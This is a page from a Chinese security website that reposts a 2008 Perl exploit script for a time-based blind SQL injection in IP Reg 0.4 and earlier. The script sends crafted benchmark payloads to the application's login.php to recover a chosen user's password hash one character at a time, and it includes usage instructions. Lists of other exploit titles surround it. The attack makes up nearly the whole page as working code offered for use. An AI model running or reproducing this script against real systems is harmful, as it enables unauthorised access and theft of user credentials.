首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IP Reg <= 0.4 Remote Blind SQL Injection Exploit
来源:StAkeR[at]hotmail[dot]it 作者:StAkeR 发布时间:2008-10-04  
#!/usr/bin/perl
# -----------------------------------------------
# IP Reg <= 0.4 Blind SQL Injection Exploit
# Discovered By StAkeR - StAkeR[at]hotmail[dot]it
# Discovered On 03/10/2008
# -----------------------------------------------
# Download http://sourceforge.net/projects/ipreg/
# -----------------------------------------------

use strict;
use LWP::UserAgent;

my @chars = (48..57, 97..102);
my $start = undef;
my $stop  = undef;
my $hash  = undef;
my $substr = 1;
my $http = new LWP::UserAgent;
my ($domain,$userid) = @ARGV;

usage() unless $domain =~ /^http:\/\/(.+?)$/i and $userid =~ /^[0-9]$/;


sub send_request
{
  my $post = undef;
  my $host = $domain;
  my $param = shift @_ or die $!;
 
  $host .= "/login.php";
  $post = $http->post($host,[
                             user_name => $param,
                             user_pass => 'admin'
                            ]);

}


sub give_char
{
  my $send = undef;
  my ($charz,$uidz) = @_;
 
  $send = "' or (select if((ascii(substring".
          "(user_pass,$uidz,1))=$charz),".
          "benchmark(200000000,char(0)),".
          "0) from user where user_id=$userid)#";

  return $send;
}


for(0..32)
{
  foreach my $set(@chars)
  {
    my $start = time();
   
    send_request(give_char($set,$substr));
   
    my $stop = time();
 
    if($stop - $start > 3)
    {
      $hash .= chr($set);
      $substr++ and last;
    }
  }
}

sub usage
{
  print "[?] IP Reg <= 0.4 (login.php) Blind SQL Injection Exploit\n";
  print "[?] Exploit Coded By StAkeR - Benchmark Method\n";
  print "[?] Usage: perl $0 http://[host] [id]\n";
  exit;
}


if(defined $hash and $http->get($domain)->is_success)  
{
  print "[?] Hash: $hash\n";
  exit;
}
else
{
  print "[?] Exploit Failed!\n";
  exit;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Serv-U 7.2.0.1 (stou con:1) De
·OpenX 2.6 (ac.php bannerid) Re
·Serv-U 7.2.0.1 Remote FTP File
·mIRC 6.34 Remote Buffer Overfl
·AdaptCMS Lite <= 1.3 Blind SQL
·ESET SysInspector - 1.1.1.0 (e
·mIRC 6.34 Remote Buffer Overfl
·phpScheduleIt <= 1.2.10 (reser
·FOSS Gallery Admin <= 1.0 Remo
·MySQL Quick Admin <= 1.5.5 (CO
·MS Windows Vista Access Violat
·ADN Forum <= 1.0b Blind SQL In
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved